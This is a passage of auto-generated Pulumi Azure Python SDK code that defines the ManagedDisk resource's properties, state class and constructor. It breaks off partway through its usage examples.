def disk_iops_read_only(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_iops_read_only", value)
@property
@pulumi.getter(name="diskIopsReadWrite")
def disk_iops_read_write(self) -> Optional[pulumi.Input[int]]:
"""
The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
"""
return pulumi.get(self, "disk_iops_read_write")
@disk_iops_read_write.setter
def disk_iops_read_write(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_iops_read_write", value)
@property
@pulumi.getter(name="diskMbpsReadOnly")
def disk_mbps_read_only(self) -> Optional[pulumi.Input[int]]:
"""
The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
"""
return pulumi.get(self, "disk_mbps_read_only")
@disk_mbps_read_only.setter
def disk_mbps_read_only(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_mbps_read_only", value)
@property
@pulumi.getter(name="diskMbpsReadWrite")
def disk_mbps_read_write(self) -> Optional[pulumi.Input[int]]:
"""
The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
"""
return pulumi.get(self, "disk_mbps_read_write")
@disk_mbps_read_write.setter
def disk_mbps_read_write(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_mbps_read_write", value)
@property
@pulumi.getter(name="diskSizeGb")
def disk_size_gb(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
"""
return pulumi.get(self, "disk_size_gb")
@disk_size_gb.setter
def disk_size_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_size_gb", value)
@property
@pulumi.getter(name="encryptionSettings")
def encryption_settings(self) -> Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']]:
"""
A `encryption_settings` block as defined below.
"""
return pulumi.get(self, "encryption_settings")
@encryption_settings.setter
def encryption_settings(self, value: Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']]):
pulumi.set(self, "encryption_settings", value)
@property
@pulumi.getter(name="galleryImageReferenceId")
def gallery_image_reference_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
"""
return pulumi.get(self, "gallery_image_reference_id")
@gallery_image_reference_id.setter
def gallery_image_reference_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "gallery_image_reference_id", value)
@property
@pulumi.getter(name="hyperVGeneration")
def hyper_v_generation(self) -> Optional[pulumi.Input[str]]:
"""
The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "hyper_v_generation")
@hyper_v_generation.setter
def hyper_v_generation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hyper_v_generation", value)
@property
@pulumi.getter(name="imageReferenceId")
def image_reference_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
"""
return pulumi.get(self, "image_reference_id")
@image_reference_id.setter
def image_reference_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_reference_id", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="logicalSectorSize")
def logical_sector_size(self) -> Optional[pulumi.Input[int]]:
"""
Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "logical_sector_size")
@logical_sector_size.setter
def logical_sector_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "logical_sector_size", value)
@property
@pulumi.getter(name="maxShares")
def max_shares(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
"""
return pulumi.get(self, "max_shares")
@max_shares.setter
def max_shares(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_shares", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="networkAccessPolicy")
def network_access_policy(self) -> Optional[pulumi.Input[str]]:
"""
Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
"""
return pulumi.get(self, "network_access_policy")
@network_access_policy.setter
def network_access_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network_access_policy", value)
@property
@pulumi.getter(name="onDemandBurstingEnabled")
def on_demand_bursting_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
"""
return pulumi.get(self, "on_demand_bursting_enabled")
@on_demand_bursting_enabled.setter
def on_demand_bursting_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "on_demand_bursting_enabled", value)
@property
@pulumi.getter(name="osType")
def os_type(self) -> Optional[pulumi.Input[str]]:
"""
Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
"""
return pulumi.get(self, "os_type")
@os_type.setter
def os_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "os_type", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether it is allowed to access the disk via public network. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter(name="sourceResourceId")
def source_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
"""
return pulumi.get(self, "source_resource_id")
@source_resource_id.setter
def source_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_resource_id", value)
@property
@pulumi.getter(name="sourceUri")
def source_uri(self) -> Optional[pulumi.Input[str]]:
"""
URI to a valid VHD file to be used when `create_option` is `Import`.
"""
return pulumi.get(self, "source_uri")
@source_uri.setter
def source_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_uri", value)
@property
@pulumi.getter(name="storageAccountId")
def storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_id")
@storage_account_id.setter
def storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_account_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def tier(self) -> Optional[pulumi.Input[str]]:
"""
The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
"""
return pulumi.get(self, "tier")
@tier.setter
def tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tier", value)
@property
@pulumi.getter(name="trustedLaunchEnabled")
def trusted_launch_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
"""
return pulumi.get(self, "trusted_launch_enabled")
@trusted_launch_enabled.setter
def trusted_launch_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "trusted_launch_enabled", value)
@property
@pulumi.getter
def zones(self) -> Optional[pulumi.Input[str]]:
"""
A collection containing the availability zone to allocate the Managed Disk in.
"""
return pulumi.get(self, "zones")
@zones.setter
def zones(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zones", value)
@pulumi.input_type
class _ManagedDiskState:
def __init__(__self__, *,
create_option: Optional[pulumi.Input[str]] = None,
disk_access_id: Optional[pulumi.Input[str]] = None,
disk_encryption_set_id: Optional[pulumi.Input[str]] = None,
disk_iops_read_only: Optional[pulumi.Input[int]] = None,
disk_iops_read_write: Optional[pulumi.Input[int]] = None,
disk_mbps_read_only: Optional[pulumi.Input[int]] = None,
disk_mbps_read_write: Optional[pulumi.Input[int]] = None,
disk_size_gb: Optional[pulumi.Input[int]] = None,
encryption_settings: Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']] = None,
gallery_image_reference_id: Optional[pulumi.Input[str]] = None,
hyper_v_generation: Optional[pulumi.Input[str]] = None,
image_reference_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logical_sector_size: Optional[pulumi.Input[int]] = None,
max_shares: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
network_access_policy: Optional[pulumi.Input[str]] = None,
on_demand_bursting_enabled: Optional[pulumi.Input[bool]] = None,
os_type: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_resource_id: Optional[pulumi.Input[str]] = None,
source_uri: Optional[pulumi.Input[str]] = None,
storage_account_id: Optional[pulumi.Input[str]] = None,
storage_account_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tier: Optional[pulumi.Input[str]] = None,
trusted_launch_enabled: Optional[pulumi.Input[bool]] = None,
zones: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ManagedDisk resources.
:param pulumi.Input[str] create_option: The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
:param pulumi.Input[str] disk_access_id: The ID of the disk access resource for using private endpoints on disks.
:param pulumi.Input[str] disk_encryption_set_id: The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
:param pulumi.Input[int] disk_iops_read_only: The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
:param pulumi.Input[int] disk_iops_read_write: The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
:param pulumi.Input[int] disk_mbps_read_only: The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
:param pulumi.Input[int] disk_mbps_read_write: The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
:param pulumi.Input[int] disk_size_gb: Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
:param pulumi.Input['ManagedDiskEncryptionSettingsArgs'] encryption_settings: A `encryption_settings` block as defined below.
:param pulumi.Input[str] gallery_image_reference_id: ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
:param pulumi.Input[str] hyper_v_generation: The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
:param pulumi.Input[str] image_reference_id: ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
:param pulumi.Input[str] location: Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] logical_sector_size: Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
:param pulumi.Input[int] max_shares: The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
:param pulumi.Input[str] name: Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
:param pulumi.Input[str] network_access_policy: Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
:param pulumi.Input[bool] on_demand_bursting_enabled: Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
:param pulumi.Input[str] os_type: Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
:param pulumi.Input[bool] public_network_access_enabled: Whether it is allowed to access the disk via public network. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Managed Disk should exist.
:param pulumi.Input[str] source_resource_id: The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
:param pulumi.Input[str] source_uri: URI to a valid VHD file to be used when `create_option` is `Import`.
:param pulumi.Input[str] storage_account_id: The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_type: The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] tier: The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
:param pulumi.Input[bool] trusted_launch_enabled: Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
:param pulumi.Input[str] zones: A collection containing the availability zone to allocate the Managed Disk in.
"""
if create_option is not None:
pulumi.set(__self__, "create_option", create_option)
if disk_access_id is not None:
pulumi.set(__self__, "disk_access_id", disk_access_id)
if disk_encryption_set_id is not None:
pulumi.set(__self__, "disk_encryption_set_id", disk_encryption_set_id)
if disk_iops_read_only is not None:
pulumi.set(__self__, "disk_iops_read_only", disk_iops_read_only)
if disk_iops_read_write is not None:
pulumi.set(__self__, "disk_iops_read_write", disk_iops_read_write)
if disk_mbps_read_only is not None:
pulumi.set(__self__, "disk_mbps_read_only", disk_mbps_read_only)
if disk_mbps_read_write is not None:
pulumi.set(__self__, "disk_mbps_read_write", disk_mbps_read_write)
if disk_size_gb is not None:
pulumi.set(__self__, "disk_size_gb", disk_size_gb)
if encryption_settings is not None:
pulumi.set(__self__, "encryption_settings", encryption_settings)
if gallery_image_reference_id is not None:
pulumi.set(__self__, "gallery_image_reference_id", gallery_image_reference_id)
if hyper_v_generation is not None:
pulumi.set(__self__, "hyper_v_generation", hyper_v_generation)
if image_reference_id is not None:
pulumi.set(__self__, "image_reference_id", image_reference_id)
if location is not None:
pulumi.set(__self__, "location", location)
if logical_sector_size is not None:
pulumi.set(__self__, "logical_sector_size", logical_sector_size)
if max_shares is not None:
pulumi.set(__self__, "max_shares", max_shares)
if name is not None:
pulumi.set(__self__, "name", name)
if network_access_policy is not None:
pulumi.set(__self__, "network_access_policy", network_access_policy)
if on_demand_bursting_enabled is not None:
pulumi.set(__self__, "on_demand_bursting_enabled", on_demand_bursting_enabled)
if os_type is not None:
pulumi.set(__self__, "os_type", os_type)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if source_resource_id is not None:
pulumi.set(__self__, "source_resource_id", source_resource_id)
if source_uri is not None:
pulumi.set(__self__, "source_uri", source_uri)
if storage_account_id is not None:
pulumi.set(__self__, "storage_account_id", storage_account_id)
if storage_account_type is not None:
pulumi.set(__self__, "storage_account_type", storage_account_type)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tier is not None:
pulumi.set(__self__, "tier", tier)
if trusted_launch_enabled is not None:
pulumi.set(__self__, "trusted_launch_enabled", trusted_launch_enabled)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="createOption")
def create_option(self) -> Optional[pulumi.Input[str]]:
"""
The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
"""
return pulumi.get(self, "create_option")
@create_option.setter
def create_option(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "create_option", value)
@property
@pulumi.getter(name="diskAccessId")
def disk_access_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the disk access resource for using private endpoints on disks.
"""
return pulumi.get(self, "disk_access_id")
@disk_access_id.setter
def disk_access_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_access_id", value)
@property
@pulumi.getter(name="diskEncryptionSetId")
def disk_encryption_set_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
"""
return pulumi.get(self, "disk_encryption_set_id")
@disk_encryption_set_id.setter
def disk_encryption_set_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_encryption_set_id", value)
@property
@pulumi.getter(name="diskIopsReadOnly")
def disk_iops_read_only(self) -> Optional[pulumi.Input[int]]:
"""
The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
"""
return pulumi.get(self, "disk_iops_read_only")
@disk_iops_read_only.setter
def disk_iops_read_only(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_iops_read_only", value)
@property
@pulumi.getter(name="diskIopsReadWrite")
def disk_iops_read_write(self) -> Optional[pulumi.Input[int]]:
"""
The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
"""
return pulumi.get(self, "disk_iops_read_write")
@disk_iops_read_write.setter
def disk_iops_read_write(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_iops_read_write", value)
@property
@pulumi.getter(name="diskMbpsReadOnly")
def disk_mbps_read_only(self) -> Optional[pulumi.Input[int]]:
"""
The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
"""
return pulumi.get(self, "disk_mbps_read_only")
@disk_mbps_read_only.setter
def disk_mbps_read_only(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_mbps_read_only", value)
@property
@pulumi.getter(name="diskMbpsReadWrite")
def disk_mbps_read_write(self) -> Optional[pulumi.Input[int]]:
"""
The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
"""
return pulumi.get(self, "disk_mbps_read_write")
@disk_mbps_read_write.setter
def disk_mbps_read_write(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_mbps_read_write", value)
@property
@pulumi.getter(name="diskSizeGb")
def disk_size_gb(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
"""
return pulumi.get(self, "disk_size_gb")
@disk_size_gb.setter
def disk_size_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_size_gb", value)
@property
@pulumi.getter(name="encryptionSettings")
def encryption_settings(self) -> Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']]:
"""
A `encryption_settings` block as defined below.
"""
return pulumi.get(self, "encryption_settings")
@encryption_settings.setter
def encryption_settings(self, value: Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']]):
pulumi.set(self, "encryption_settings", value)
@property
@pulumi.getter(name="galleryImageReferenceId")
def gallery_image_reference_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
"""
return pulumi.get(self, "gallery_image_reference_id")
@gallery_image_reference_id.setter
def gallery_image_reference_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "gallery_image_reference_id", value)
@property
@pulumi.getter(name="hyperVGeneration")
def hyper_v_generation(self) -> Optional[pulumi.Input[str]]:
"""
The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "hyper_v_generation")
@hyper_v_generation.setter
def hyper_v_generation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hyper_v_generation", value)
@property
@pulumi.getter(name="imageReferenceId")
def image_reference_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
"""
return pulumi.get(self, "image_reference_id")
@image_reference_id.setter
def image_reference_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_reference_id", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="logicalSectorSize")
def logical_sector_size(self) -> Optional[pulumi.Input[int]]:
"""
Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "logical_sector_size")
@logical_sector_size.setter
def logical_sector_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "logical_sector_size", value)
@property
@pulumi.getter(name="maxShares")
def max_shares(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
"""
return pulumi.get(self, "max_shares")
@max_shares.setter
def max_shares(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_shares", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="networkAccessPolicy")
def network_access_policy(self) -> Optional[pulumi.Input[str]]:
"""
Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
"""
return pulumi.get(self, "network_access_policy")
@network_access_policy.setter
def network_access_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network_access_policy", value)
@property
@pulumi.getter(name="onDemandBurstingEnabled")
def on_demand_bursting_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
"""
return pulumi.get(self, "on_demand_bursting_enabled")
@on_demand_bursting_enabled.setter
def on_demand_bursting_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "on_demand_bursting_enabled", value)
@property
@pulumi.getter(name="osType")
def os_type(self) -> Optional[pulumi.Input[str]]:
"""
Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
"""
return pulumi.get(self, "os_type")
@os_type.setter
def os_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "os_type", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether it is allowed to access the disk via public network. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the Managed Disk should exist.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="sourceResourceId")
def source_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
"""
return pulumi.get(self, "source_resource_id")
@source_resource_id.setter
def source_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_resource_id", value)
@property
@pulumi.getter(name="sourceUri")
def source_uri(self) -> Optional[pulumi.Input[str]]:
"""
URI to a valid VHD file to be used when `create_option` is `Import`.
"""
return pulumi.get(self, "source_uri")
@source_uri.setter
def source_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_uri", value)
@property
@pulumi.getter(name="storageAccountId")
def storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_id")
@storage_account_id.setter
def storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_account_id", value)
@property
@pulumi.getter(name="storageAccountType")
def storage_account_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
"""
return pulumi.get(self, "storage_account_type")
@storage_account_type.setter
def storage_account_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_account_type", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def tier(self) -> Optional[pulumi.Input[str]]:
"""
The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
"""
return pulumi.get(self, "tier")
@tier.setter
def tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tier", value)
@property
@pulumi.getter(name="trustedLaunchEnabled")
def trusted_launch_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
"""
return pulumi.get(self, "trusted_launch_enabled")
@trusted_launch_enabled.setter
def trusted_launch_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "trusted_launch_enabled", value)
@property
@pulumi.getter
def zones(self) -> Optional[pulumi.Input[str]]:
"""
A collection containing the availability zone to allocate the Managed Disk in.
"""
return pulumi.get(self, "zones")
@zones.setter
def zones(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zones", value)
class ManagedDisk(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
create_option: Optional[pulumi.Input[str]] = None,
disk_access_id: Optional[pulumi.Input[str]] = None,
disk_encryption_set_id: Optional[pulumi.Input[str]] = None,
disk_iops_read_only: Optional[pulumi.Input[int]] = None,
disk_iops_read_write: Optional[pulumi.Input[int]] = None,
disk_mbps_read_only: Optional[pulumi.Input[int]] = None,
disk_mbps_read_write: Optional[pulumi.Input[int]] = None,
disk_size_gb: Optional[pulumi.Input[int]] = None,
encryption_settings: Optional[pulumi.Input[pulumi.InputType['ManagedDiskEncryptionSettingsArgs']]] = None,
gallery_image_reference_id: Optional[pulumi.Input[str]] = None,
hyper_v_generation: Optional[pulumi.Input[str]] = None,
image_reference_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logical_sector_size: Optional[pulumi.Input[int]] = None,
max_shares: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
network_access_policy: Optional[pulumi.Input[str]] = None,
on_demand_bursting_enabled: Optional[pulumi.Input[bool]] = None,
os_type: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_resource_id: Optional[pulumi.Input[str]] = None,
source_uri: Optional[pulumi.Input[str]] = None,
storage_account_id: Optional[pulumi.Input[str]] = None,
storage_account_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tier: Optional[pulumi.Input[str]] = None,
trusted_launch_enabled: Optional[pulumi.Input[bool]] = None,
zones: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a managed disk.
## Example Usage
### With Create Empty
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_managed_disk = azure.compute.ManagedDisk("exampleManagedDisk",
location="West US 2",
resource_group_name=example_resource_group.name,
storage_account_type="Standard_LRS",
create_option="Empty",
disk_size_gb=1,
tags={
"environment": "staging",
})
```
### With Create Copy
```python
import pulumi
import pulumi_azure as azure
example = azure.core.ResourceGroup("example", location="West Europe")
source = azure.compute.ManagedDisk("source",
location="West US 2",
resource_group_name=example.name,
storage_account_type="Standard_LRS",
